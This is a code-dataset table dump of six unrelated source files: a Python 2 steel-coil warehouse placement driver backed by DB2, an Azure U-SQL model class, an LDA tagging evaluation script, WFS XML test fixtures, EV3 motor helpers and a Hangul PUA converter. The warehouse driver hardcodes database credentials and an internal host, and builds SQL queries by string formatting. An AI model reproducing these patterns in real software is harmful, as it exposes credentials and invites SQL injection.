repo_name (stringlengths 5-92) | path (stringlengths 4-232) | copies (stringclasses, 18 values) | size (stringlengths 4-7) | content (stringlengths 736-1.04M) | license (stringclasses, 15 values) | hash (int64, -9,222,983,980,000,580,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
alicexpp/stock_algorithm_merge | driver.py | 1 | 11179 | #coding=utf-8
from __future__ import with_statement
import sys
from pyke import knowledge_engine
from pyke import krb_compiler
from pyke import krb_traceback
from pyke import goal
import ibm_db
import ibm_db_dbi
import datetime
import time
import recommend_area
import BaseClass
import random
import area_coordinate_trans
Area_information = {'A1C': BaseClass.AREA(), 'A2C': BaseClass.AREA(), 'A3C': BaseClass.AREA(), 'A4C': BaseClass.AREA(),
'A5C': BaseClass.AREA(), 'A6C': BaseClass.AREA(), 'A7C': BaseClass.AREA(), 'A1S': BaseClass.AREA(),
'A2S': BaseClass.AREA(), 'A3S': BaseClass.AREA(), 'A4S': BaseClass.AREA(), 'A5S': BaseClass.AREA()}
engine = knowledge_engine.engine(__file__)
# 激活事实库
engine.activate('fc_area_recommend')
# 判断库满的函数
def fc_test(coil_kind, external_diameter, width, status1=1,Flag='0'):
fc_goal = goal.compile('coil_area.move_area($coil_kind,$area,$status)')
try:
with fc_goal.prove(engine, coil_kind=coil_kind, status=status1) as gen:
for vars, plan in gen:
# 读取数据库中库区的信息
# 当前库区的最大长度
Max_Length = select_data('UACS_STOCK_INFO', vars['area'])[0]
# 当前库区的最大宽度
Max_Width = select_data('UACS_STOCK_INFO', vars['area'])[1]
# 当前库区的库容率
Current_Ratio = select_data('UACS_STOCK_INFO', vars['area'])[2]
# 计算该钢卷放入之后的库容率
Cal_Capacity= Current_Ratio + (external_diameter * width)/ (Max_Length * Max_Width)
# print "若该钢卷放入%s区域,库容率为%f"%(vars['area'],Cal_Capacity)
if Cal_Capacity < 1 and Flag=='0':
print"%s should be played in %s" % (coil_kind, vars['area'])
return vars['area']
if Cal_Capacity>=1 or Flag=='1':
if Flag=='1':
print "the saddle of %s area is full" % (vars['area'])
else:
print "the %s area is full" % (vars['area'])
status_n = status1 + 1
return fc_test(coil_kind,external_diameter,width,status1=status_n)
return "null"
except:
print "something err"
krb_traceback.print_exc()
sys.exit()
# 连接数据库
conn = ibm_db.connect("DRIVER = {IBM DB2 ODBC DRIVER}; DATABASE=UACSDB0; HOSTNAME=10.25.101.8;PORT=50000;PROTOCOL=TCPIP;UID=UACSAPP;PWD=UACSAPP;","","")
conn_ibm_dbi=ibm_db_dbi.connect("DRIVER={IBM DB2 ODBC DRIVER};DATABASE=UACSDB0;HOSTNAME=10.25.101.8;PORT=50000;PROTOCOL=TCPIP;UID=UACSAPP;PWD=UACSAPP;","","")
if conn:
print "connect db2 successed"
# 读取数据库中,每个库区的当前库容量、最大库容量
def select_data(table_name, area_name):
sql="SELECT * FROM %s WHERE STOCK_NAME='%s'"% (table_name,area_name)
stmt = ibm_db.exec_immediate(conn,sql)
row = ibm_db.fetch_assoc(stmt)
return row['MAX_LENGTH'], row['MAX_WIDTH'], row['CURRENT_RATIO']
# 更新数据库,放入一个钢卷,数据库的当前库容量加1
def update_current(table_name, area_name):
old_result=select_data(table_name,area_name)
new_current=old_result[0]+1
update_sql="UPDATE %s SET CURRENT_NO='%d' WHERE STOCK_NAME='%s'"%(table_name,new_current,area_name)
ibm_db.exec_immediate(conn,update_sql)
ibm_db.commit(conn)
return new_current
# 按行堆放的钢卷
def select_position(area, row_number, column_number, current_num):
#第i行
i=current_num/column_number+1
#第j列
j=current_num%column_number
while j==0:
i=i-1
j=column_number
print 'the coil should put in %s, %d 排,%d 列' % (area,i, j)
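# Worked example of the row/column arithmetic above (assuming column_number=4,
# chosen here only for illustration): current_num=5 gives i=5/4+1=2 and j=5%4=1,
# i.e. row 2, column 1; current_num=8 first yields j=0, so the while loop rewinds
# to row i=2 and the last column j=4.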
# c++调用的函数接口
def place_position(coil_information):
begin = datetime.datetime.now().microsecond
begin1=time.time()
area_name = fc_test(coil_information)
update_current('UACS_STOCK_INFORMATION_TEST', area_name)
end = datetime.datetime.now().microsecond
end1=time.time()
re=float(end-begin)
print "python程序执行时间为:%f ms" % (re/1000.0)
# 统计区域中的可放钢卷位的位数
def count_area_num(table_name, area_name):
select_sql = "SELECT COUNT(*) FROM %s WHERE PLACEMENT_STATUS='0'AND STOCK_NUM='%s'"%(table_name,area_name)
stmt = ibm_db.exec_immediate(conn, select_sql)
# row是字典形式
row = ibm_db.fetch_assoc(stmt)
#返回该区域的可放钢卷的位数
return row['1']
# 先找最小库位号的库位信息
def find_min_region(table_name, area_name):
select_sql = "SELECT MIN(REGION_NUM) FROM %s WHERE PLACEMENT_STATUS='0'AND STOCK_NUM='%s'"%(table_name,area_name)
stmt = ibm_db.exec_immediate(conn, select_sql)
# row是字典形式
row = ibm_db.fetch_assoc(stmt)
return row['1']
# 更新最小库位号的库位状态信息,把状态0改为状态1
def update_min_region(table_name, area_name):
region_num=find_min_region(table_name,area_name)
update_sql = "UPDATE %s SET PLACEMENT_STATUS ='%d' WHERE REGION_NUM='%s'" % (table_name, 1, region_num)
ibm_db.exec_immediate(conn, update_sql)
ibm_db.commit(conn)
return region_num
# 放置钢卷后,更新库区的库容率
def update_area_ratio(table_name, area_name, new_ratio):
update_ratio = "UPDATE %s SET CURRENT_RATIO = '%f' WHERE STOCK_NAME = '%s' "%(table_name, new_ratio, area_name)
ibm_db.exec_immediate(conn, update_ratio)
ibm_db.commit(conn)
return area_name
# 读取库图数据库中的钢卷占用库区状态
def read_stock_status(table_name, area_name):
list = []
sql="SELECT * FROM %s WHERE STOCK_NAME = '%s'" % (table_name,area_name)
c = conn_ibm_dbi.cursor()
c.execute(sql)
rows = c.fetchall()
return rows
# 先判断推荐库位,再根据库位推荐相应的库区的函数
def recommend_stock_position(table_name, coil_information, external_diameter, width, Flag = '0'):
area_name = fc_test(coil_information, float(external_diameter), float(width),Flag=Flag)
Max_Length = select_data(table_name, area_name)[0]
Max_Width = select_data(table_name, area_name)[1]
Current_Capacity = select_data(table_name, area_name)[2]
print "current storage_capacity is:", Current_Capacity
center_x = 1100
center_y = 1050
while float(width) / 2 > center_x:
center_x = center_x + 2200
while float(external_diameter) / 2 > center_y:
center_y = center_y + 600
print "start center_x:", center_x
print "start center_y:", center_y
# steel_information表示小区的rect,所以其坐标也是小区的
steel_information = BaseClass.RECT(llp=BaseClass.POINT(center_x - float(width) / 2,
center_y - float(external_diameter) / 2),
length=float(external_diameter),
width=float(width))
# 获取当前区域的steel_list,每个区域的steel_list不同
# 在该处应该先读取数据库中鞍座的占有情况,将其append到new_steel_list中去
# 读取的是整个库区中的鞍座坐标占用
exist_steel_lists = read_stock_status('UACS_STOCK_STATUS_TEST', area_name)
new_steel_list = []
for item in exist_steel_lists:
CENTER_X = item[1]
CENTER_Y = item[2]
# 将X_CENTER(大区坐标)转换成小区坐标
center_x_exist = area_coordinate_trans.absolute_to_relative(area_name, CENTER_X, CENTER_Y)[0]
# 将Y_CENTER(大区坐标)转换成小区坐标
center_y_exist = area_coordinate_trans.absolute_to_relative(area_name, CENTER_X, CENTER_Y)[1]
external_diameter_exist = item[4]
width_exist = item[5]
steel_exist = BaseClass.RECT(llp=BaseClass.POINT(center_x_exist-width_exist/2.,
center_y_exist-external_diameter_exist/2.),
length = float(external_diameter_exist),
width = float(width_exist))
new_steel_list.append(steel_exist)
# recommend_area.paint_exit_rect(new_steel_list)
# recommend_area.show_all_rect(area_name,Max_Length,Max_Width)
# print "%s 库区中的钢卷个数为 %d" % (area_name,len(new_steel_list))
# print "%s 库区中现有的钢卷为:"% area_name
# print new_steel_list
# recommend_area.paint_exit_rect(new_steel_list)
# recommend_area.show_all_rect(area_name,Max_Length,Max_Width)
recommend_result = recommend_area.find_suit_pos(steel_information, new_steel_list,
Max_Length, Max_Width, area_name, Current_Capacity)
if recommend_result != False:
new_storage_capacity = recommend_result[0]
recommend_saddle_rect = recommend_result[1]
update_area_ratio('UACS_STOCK_INFO', area_name, new_storage_capacity)
print "after place coil the storage_capacity is:", new_storage_capacity
# print "the coil should put in %s area" % area_name
# 推荐的鞍座坐标
saddle_center_x = recommend_area.output_coordinate_x(recommend_saddle_rect)
saddle_center_y = recommend_area.output_coordinate_y(recommend_saddle_rect)
# 更新库区状态数据库
# print area_name,center_x,center_y,coil_information,external_diameter,width
update_stock_status="INSERT INTO UACS_STOCK_STATUS_TEST(STOCK_NAME,X_CENTER,Y_CENTER,COIL_KIND_NAME," \
"COIL_OUT_LENGTH,COIL_WIDTH) VALUES('%s','%.2f',%.2f,'%s',%d,%d)"%\
(area_name,saddle_center_x,saddle_center_y,coil_information,external_diameter,width)
ibm_db.exec_immediate(conn, update_stock_status)
return area_name
else:
# 加入Flag标志位,是为了表示当库容率小于1,但是却没有鞍座可以放置的情况,因此fc_test中也需要加入Flag作为判断
Flag = '1'
return recommend_stock_position(table_name, coil_information, external_diameter, width,Flag=Flag)
if __name__ == "__main__":
while True:
# external_diameter =raw_input("请输入钢卷外径:")
external_diameter=random.randint(1000, 1200)
print "请输入钢卷外径:", external_diameter
# width = raw_input("请输入钢卷宽度:")
width = random.randint(1300, 2000)
print "请输入钢卷宽度:", width
steel_kind_list = ["back_closed_coil","hot_closed_coil","finished_product","back_coil","hot_coil",
"2030","back_retreat_coil","hot_retreat_coil","back_return_coil"]
steel_name=random.sample(steel_kind_list,1)[0]
print "钢卷种类:",steel_name
recommend_stock_position('UACS_STOCK_INFO', steel_name, float(external_diameter),float(width))
# recommend_stock_position('UACS_STOCK_INFO', 'hot_coil', float(external_diameter), float(width))
| gpl-3.0 | -3,430,614,603,294,191,000 | 41.311203 | 158 | 0.620967 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_procedure_py3.py | 1 | 2005 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item_py3 import CatalogItem
class USqlProcedure(CatalogItem):
"""A Data Lake Analytics catalog U-SQL procedure item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param schema_name: the name of the schema associated with this procedure
and database.
:type schema_name: str
:param name: the name of the procedure.
:type name: str
:param definition: the defined query of the procedure.
:type definition: str
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'schema_name': {'key': 'schemaName', 'type': 'str'},
'name': {'key': 'procName', 'type': 'str'},
'definition': {'key': 'definition', 'type': 'str'},
}
def __init__(self, *, compute_account_name: str=None, version: str=None, database_name: str=None, schema_name: str=None, name: str=None, definition: str=None, **kwargs) -> None:
super(USqlProcedure, self).__init__(compute_account_name=compute_account_name, version=version, **kwargs)
self.database_name = database_name
self.schema_name = schema_name
self.name = name
self.definition = definition
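# Usage sketch (every field value below is illustrative, not taken from a real catalog):
#   proc = USqlProcedure(compute_account_name='myadlaccount', database_name='master',
#                        schema_name='dbo', name='usp_example',
#                        definition='CREATE PROCEDURE dbo.usp_example() AS BEGIN ... END;')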
| mit | -5,115,003,405,439,517,000 | 41.659574 | 181 | 0.611471 | false |
mago1chi/cTPR | calc_raw_lda_result.py | 1 | 7204 | import psycopg2
import os, sys
TOPIC_NUM_LIST = [30, 100, 200, 500]
if len(sys.argv) is 1:
print("トピック数を入力")
exit()
topic_num = int(sys.argv[1])
if not topic_num in TOPIC_NUM_LIST:
print("入力可能なトピック数は ", end="")
for each in TOPIC_NUM_LIST:
print("{0} ".format(each), end="")
print("です.")
exit()
DBPATH = "dbname=image_tagging host=localhost user=postgres"
con = psycopg2.connect(DBPATH)
concur = con.cursor()
concur.execute('''select distinct a.tweet_id from answer as a, answer_all as b
where a.tweet_id=b.tweet_id''')
tweet_id_list = [x for x in map(lambda y: y[0], concur.fetchall())]
lda_score = {}
except_score = {}
histgram_dic = {}
query = "select distinct tag from exp_rawlda{0} where tweet_id=%s".format(topic_num)
for each_tweet_id in tweet_id_list:
concur.execute(query, (each_tweet_id,))
tag_set = { x for x in map(lambda y: y[0], concur.fetchall()) }
concur.execute('''select distinct tag from answer where tweet_id=%s''', (each_tweet_id,))
except_tag_set = { x for x in map(lambda y: y[0], concur.fetchall()) } - tag_set
good_num = 0
bad_num = 0
for each_tag in tag_set:
concur.execute('''select score from answer
where tweet_id=%s and tag=%s''', (each_tweet_id, each_tag))
score = concur.fetchone()[0]
if score is 1:
good_num += 1
else:
bad_num += 1
if not bad_num in histgram_dic.keys():
histgram_dic[bad_num] = 1
else:
histgram_dic[bad_num] += 1
except_good_num = 0
except_bad_num = 0
for each_tag in except_tag_set:
concur.execute('''select score from answer
where tweet_id=%s and tag=%s''', (each_tweet_id, each_tag))
score = concur.fetchone()[0]
if score is 1:
except_good_num += 1
else:
except_bad_num += 1
lda_score[each_tweet_id] = {'good_num': good_num, 'bad_num': bad_num}
except_score[each_tweet_id] = {'good_num': except_good_num, 'bad_num': except_bad_num}
good_rate_sum = 0
good_only_num = 0
bad_only_num = 0
good_sum = 0
bad_sum = 0
zero_num = 0
for each_tweet_id, value in lda_score.items():
each_good_num = value['good_num']
each_bad_num = value['bad_num']
good_sum += each_good_num
bad_sum += each_bad_num
if each_good_num > 0 and each_bad_num is 0:
good_only_num += 1
if each_good_num is 0 and each_bad_num > 0:
bad_only_num += 1
if each_good_num + each_bad_num == 0:
zero_num += 1
else:
good_rate_sum += each_good_num / (each_good_num + each_bad_num)
good_rate = round(good_rate_sum / (len(lda_score) - zero_num), 3)
total_good_rate = round(good_sum / (good_sum + bad_sum), 3)
except_good_sum = 0
except_bad_sum = 0
except_bad_rate_sum = 0
zero_num = 0
for each_tweet_id, value in except_score.items():
each_good_num = value['good_num']
each_bad_num = value['bad_num']
except_good_sum += each_good_num
except_bad_sum += each_bad_num
if each_good_num + each_bad_num is 0:
zero_num += 1
else:
except_bad_rate_sum += each_bad_num / (each_good_num + each_bad_num)
except_bad_rate = round(except_bad_rate_sum / (len(except_score)-zero_num), 3)
remain_bad_rate = round(bad_sum / (bad_sum + except_bad_sum), 3)
total_tag_num = good_sum + bad_sum + except_good_sum + except_bad_sum
good_only_rate = round(good_only_num / len(lda_score), 3)
good_and_bad_rate = round((len(lda_score) - bad_only_num - good_only_num) / len(lda_score), 3)
bad_only_rate = 1.0 - good_only_rate - good_and_bad_rate
print('''正解タグのみの割合: {0}({1})
正解タグとノイズ両方を含む割合: {2}
ノイズタグのみを含む割合: {3}
正解タグ含有率の平均: {4}
付与したタグのうち正解だった数: {5} / {6} = {7}
全ノイズタグのうち除去できなかったタグの数: {8} / {9} = {10}
全タグ数: {11}
'''.format(good_only_rate, len(lda_score), good_and_bad_rate, bad_only_rate, good_rate, good_sum, good_sum+bad_sum, \
total_good_rate, bad_sum, bad_sum+except_bad_sum, remain_bad_rate, total_tag_num))
good_recall_rate_sum = 0
fmeasure_sum = 0
zero_num = 0
for each_tweet_id in tweet_id_list:
each_good_num = lda_score[each_tweet_id]['good_num']
each_bad_num = lda_score[each_tweet_id]['bad_num']
each_except_good_num = except_score[each_tweet_id]['good_num']
if each_good_num + each_except_good_num is 0:
zero_num += 1
else:
if each_good_num + each_bad_num != 0:
precision = each_good_num / (each_good_num + each_bad_num)
else:
precision = 0
if each_good_num + each_except_good_num != 0:
recall = each_good_num / (each_good_num + each_except_good_num)
else:
recall = 0
good_recall_rate_sum += recall
if precision + recall != 0:
fmeasure_sum += 2*precision*recall / (precision + recall)
ave_recall_rate = round(good_recall_rate_sum / (len(lda_score)-zero_num), 3)
total_recall = round(good_sum / (good_sum+except_good_sum), 3)
good_fmeasure = round(2*total_good_rate*total_recall / (total_good_rate + total_recall), 3)
ave_good_fmeasure = round(fmeasure_sum / (len(tweet_id_list)-zero_num), 3)
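# The F-measure (F値) reported below is the usual harmonic mean F1 = 2*P*R / (P + R),
# computed once from the pooled counts (total_good_rate, total_recall) and once as the
# mean of the per-image F1 scores (ave_good_fmeasure).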
print('''正解タグ
全体の適合率: {0}
全体の再現率: {1}
F値: {2}
適合率の平均: {3}
再現率の平均: {4}
F値(平均): {5}
'''.format(total_good_rate, total_recall, good_fmeasure, good_rate, ave_recall_rate, ave_good_fmeasure))
except_bad_recall_rate_sum = 0
removed_fmeasure_sum = 0
zero_num = 0
for each_tweet_id in tweet_id_list:
each_bad_num = lda_score[each_tweet_id]['bad_num']
each_except_good_num = except_score[each_tweet_id]['good_num']
each_except_bad_num = except_score[each_tweet_id]['bad_num']
if each_bad_num + each_except_bad_num is 0:
zero_num += 1
else:
if each_except_good_num + each_except_bad_num != 0:
precision = each_except_bad_num / (each_except_good_num + each_except_bad_num)
else:
precision = 0
if each_bad_num + each_except_bad_num != 0:
recall = each_except_bad_num / (each_bad_num + each_except_bad_num)
else:
recall = 0
except_bad_recall_rate_sum += recall
if precision + recall != 0:
removed_fmeasure_sum += 2*precision*recall / (precision + recall)
ave_bad_recall_rate = round(except_bad_recall_rate_sum / (len(lda_score)-zero_num), 3)
removed_bad_precision = round(except_bad_sum / (except_good_sum + except_bad_sum), 3)
removed_bad_recall = round(except_bad_sum / (bad_sum + except_bad_sum), 3)
removed_bad_fmeasure = round(2*removed_bad_precision*removed_bad_recall / (removed_bad_precision + removed_bad_recall), 3)
ave_removed_bad_fmeasure = round(removed_fmeasure_sum / (len(tweet_id_list)-zero_num), 3)
print('''除去したノイズタグ
全体の適合率: {0}
全体の再現率: {1}
F値: {2}
適合率の平均: {3}
再現率の平均: {4}
F値(平均): {5}
'''.format(removed_bad_precision, removed_bad_recall, removed_bad_fmeasure, except_bad_rate, ave_bad_recall_rate, ave_removed_bad_fmeasure))
print("提案手法適用後のノイズ数分布(トピック数:{0})".format(topic_num))
print("ノイズ数,画像数")
for k, v in histgram_dic.items():
print("{0},{1}".format(k, v))
| gpl-2.0 | 9,060,584,416,003,994,000 | 28.017094 | 140 | 0.644772 | false |
tsauerwein/c2cgeoportal | c2cgeoportal/tests/xmlstr.py | 3 | 5978 | # -*- coding: utf-8 -*-
# Copyright (c) 2013-2014, Camptocamp SA
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
getfeature = """
<wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" service="WFS" version="1.1.0" xsi:schemaLocation="http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<wfs:Query typeName="feature:grundstueck" srsName="EPSG:2056" xmlns:feature="http://mapserver.gis.umn.edu/mapserver">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc">
<ogc:PropertyIsLike matchCase="false" wildCard="*" singleChar="." escapeChar="!">
<ogc:PropertyName>nummer</ogc:PropertyName>
<ogc:Literal>10*</ogc:Literal>
</ogc:PropertyIsLike>
</ogc:Filter>
</wfs:Query>
</wfs:GetFeature>
"""
feature = """
<gml:featureMember>
<ms:grundstueck>
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2626901.051818 1258035.790009</gml:lowerCorner>
<gml:upperCorner>2627050.862856 1258132.841364</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
<ms:msGeometry>
<gml:LineString srsName="EPSG:2056">
<gml:posList srsDimension="2">2627033.201116 1258103.390372 2627034.048142 1258105.737388 2627010.821109 1258118.506850 2626985.111074 1258132.841364 2626980.135958 1258123.622322 2626978.010913 1258120.089309 2626966.170890 1258126.005538 2626949.985629 1258108.760552 2626924.919220 1258081.422566 2626910.187979 1258065.386575 2626901.051818 1258054.063564 2626935.224905 1258039.509934 2626956.098017 1258037.068626 2626971.167108 1258036.400415 2627000.949294 1258035.790009 2627018.708458 1258041.255835 2627029.967583 1258047.114753 2627048.056822 1258060.580669 2627050.862856 1258062.337652 2627048.942861 1258064.236700 2627036.107888 1258076.303014 2627023.360917 1258088.497329 2627028.596025 1258096.640354 2627033.201116 1258103.390372 </gml:posList>
</gml:LineString>
</ms:msGeometry>
<ms:gs_id>1676545</ms:gs_id>
<ms:lsn_oid>1510175178</ms:lsn_oid>
<ms:nummer>1071</ms:nummer>
<ms:gueltigkeit>rechtskräftig</ms:gueltigkeit>
<ms:art>Liegenschaft</ms:art>
<ms:gemeinde_id_bfs>2861</ms:gemeinde_id_bfs>
<ms:meta_id>1510</ms:meta_id>
<ms:flaechenmass>8774</ms:flaechenmass>
<ms:nummer_m_deko>1071</ms:nummer_m_deko>
<ms:nbident>BL0200002861</ms:nbident>
<ms:vollstaendigkeit>vollständig</ms:vollstaendigkeit>
<ms:datenherr>Jermann</ms:datenherr>
<ms:mut_nummer>pn18</ms:mut_nummer>
</ms:grundstueck>
</gml:featureMember>
"""
featurecollection_outlimit = """
<wfs:FeatureCollection xmlns:ms="http://mapserver.gis.umn.edu/mapserver" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wfs="http://www.opengis.net/wfs" xsi:schemaLocation="http://mapserver.gis.umn.edu/mapserver http://c2cpc29.camptocamp.com/sbrunner/mapserv?SERVICE=WFS&VERSION=1.1.0&REQUEST=DescribeFeatureType&TYPENAME=feature:grundstueck&OUTPUTFORMAT=text/xml;%20subtype=gml/3.1.1 http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2595270.118588 1244096.257242</gml:lowerCorner>
<gml:upperCorner>2638409.063753 1267658.751429</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
""" + feature * 205 + """
</wfs:FeatureCollection>
"""
featurecollection_inlimit = """
<wfs:FeatureCollection xmlns:ms="http://mapserver.gis.umn.edu/mapserver" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wfs="http://www.opengis.net/wfs" xsi:schemaLocation="http://mapserver.gis.umn.edu/mapserver http://c2cpc29.camptocamp.com/sbrunner/mapserv?SERVICE=WFS&VERSION=1.1.0&REQUEST=DescribeFeatureType&TYPENAME=feature:grundstueck&OUTPUTFORMAT=text/xml;%20subtype=gml/3.1.1 http://www.opengis.net/wfs http://schemas.opengis.net/wfs/1.1.0/wfs.xsd">
<gml:boundedBy>
<gml:Envelope srsName="EPSG:2056">
<gml:lowerCorner>2595270.118588 1244096.257242</gml:lowerCorner>
<gml:upperCorner>2638409.063753 1267658.751429</gml:upperCorner>
</gml:Envelope>
</gml:boundedBy>
""" + feature * 199 + """
</wfs:FeatureCollection>
"""
| bsd-2-clause | -5,369,876,525,444,830,000 | 60.608247 | 776 | 0.732932 | false |
lavish/drs | robot/ev3dev_utils.py | 1 | 3416 | import time, ev3dev
def run_for(motor, power=75, ever=None, seconds=None, degrees=None):
""" Run motor for specified amount of seconds, degrees, or forever
Examples:
run_for(motor, ever=True)
run_for(motor, seconds=0.5)
run_for(motor, degrees=270, power=100)
Power is specified in percents in the range of [-100; 100]. In case the
motor is in regulation mode, the power value is used to compute
pulses_per_seconds value. The upper limits for pulses_per_second assumed to
be 900 and 1200 for tacho and minitacho motors accordingly.
"""
#motor.regulation_mode = ev3dev.motor.mode_on
if motor.regulation_mode == ev3dev.motor.mode_on:
motor.pulses_per_second_setpoint = int(power)
else:
motor.duty_cycle_setpoint = int(power)
if ever is not None:
motor.run_mode = ev3dev.motor.run_mode_forever
elif seconds is not None:
motor.run_mode = ev3dev.motor.run_mode_time
motor.time_setpoint = int(seconds * 1000)
elif degrees is not None:
motor.run_mode = ev3dev.motor.run_mode_position
motor.position_mode = ev3dev.motor.position_mode_relative
motor.position = 0
motor.position_setpoint = int(degrees)
motor.run()
def run_until(motor, power=75, degrees=None, check=None):
""" Run motor until specified position or until check() evaluates to True.
Examples:
run_until(motor, degrees=270, power=40)
run_until(motor, check=lambda: touch_sensor.value())
Power is specified in percents in the range of [-100; 100]. In case the
motor is in regulation mode, the power value is used to compute
pulses_per_second value. The upper limits for pulses_per_second are assumed to
be 900 and 1200 for tacho and minitacho motors respectively.
"""
if motor.regulation_mode == ev3dev.motor.mode_on:
if motor.type() == 'tacho':
motor.pulses_per_second_setpoint = int(power * 9)
elif motor.type() == 'minitacho':
motor.pulses_per_second_setpoint = int(power * 12)
else:
motor.duty_cycle_setpoint = int(power)
if degrees is not None:
motor.run_mode = ev3dev.motor.run_mode_position
motor.position_mode = ev3dev.motor.position_mode_absolute
motor.position_setpoint = int(degrees)
else:
motor.run_mode = ev3dev.motor.run_mode_forever
motor.run()
while True:
if degrees is not None:
if not motor.running(): break
elif check():
motor.stop()
break
def drive_for(left_motor, right_motor, direction=0, power=75, ever=None, seconds=None):
""" Run both motors for a specified amount of seconds, or forever. The
direction parameter is in range [-100, 100] and specifies how fast the
robot should turn.
direction = -100: turn left as fast as possible,
direction = 0: drive forward,
direction = 100: turn right as fast as possible.
The motor on the outer arc is driven at full power (specified as 'power'
parameter), and the inner motor power is computed accordingly.
"""
if (direction >= 0):
master = left_motor
slave = right_motor
else:
master = right_motor
slave = left_motor
mpower = power
spower = power * (50 - abs(direction)) / 50
run_for(master, mpower, ever, seconds)
run_for(slave, spower, ever, seconds)
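# Usage sketch for drive_for (left/right are assumed to be motor objects created with the
# same ev3dev binding imported above; how they are constructed is up to the caller):
#   drive_for(left, right, direction=0, power=75, seconds=2)      # straight ahead for 2 s
#   drive_for(left, right, direction=100, power=75, ever=True)    # turn right on the spot
#   drive_for(left, right, direction=-50, power=60, seconds=1.5)  # gentle left arc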
| mit | -6,067,089,681,917,996,000 | 34.583333 | 87 | 0.657201 | false |
mete0r/hypua2jamo | src/hypua2jamo/__init__.py | 1 | 2055 | # -*- coding: utf-8 -*-
# hypua2jamo: Convert Hanyang-PUA code to unicode Hangul Jamo
# Copyright (C) 2012 mete0r
#
# This file is part of hypua2jamo.
#
# hypua2jamo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# hypua2jamo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with hypua2jamo. If not, see <http://www.gnu.org/licenses/>.
import sys
import logging
__version__ = '0.6.dev0'
logger = logging.getLogger(__name__)
jython = sys.platform.startswith('java')
if sys.version >= '3':
unichr = chr
def translate(pua, composed=True):
''' Convert a unicode string with Hanyang-PUA codes
to a Syllable-Initial-Peak-Final encoded unicode string.
:param pua: a unicode string with Hanyang-PUA codes
:param composed: the result should be composed as much as possible (default True)
:return: Syllable-Initial-Peak-Final encoded unicode string
'''
from .encoder import PUAComposedEncoder
from .encoder import PUADecomposedEncoder
if composed:
JamoEncoder = PUAComposedEncoder
else:
JamoEncoder = PUADecomposedEncoder
encoder = JamoEncoder()
return encoder.encode(pua, final=True)
def codes2unicode(codes, composed=True):
''' Convert Hanyang-PUA code iterable to Syllable-Initial-Peak-Final
encoded unicode string.
:param codes:
an iterable of Hanyang-PUA code
:param composed:
the result should be composed as much as possible (default True)
:return: Syllable-Initial-Peak-Final encoded unicode string
'''
pua = u''.join(unichr(code) for code in codes)
return translate(pua, composed=composed)
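# Usage sketch (the code point below is an arbitrary value from the Hanyang PUA range,
# shown only to illustrate the call shape, not a verified mapping):
#   jamo = translate(u'\ue0bc')                      # composed Jamo (default)
#   jamo_nfd = translate(u'\ue0bc', composed=False)  # decomposed Jamo
#   same = codes2unicode([0xe0bc])                   # same conversion from an iterable of codes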
| lgpl-3.0 | -3,895,820,284,967,063,600 | 31.619048 | 77 | 0.723601 | false |
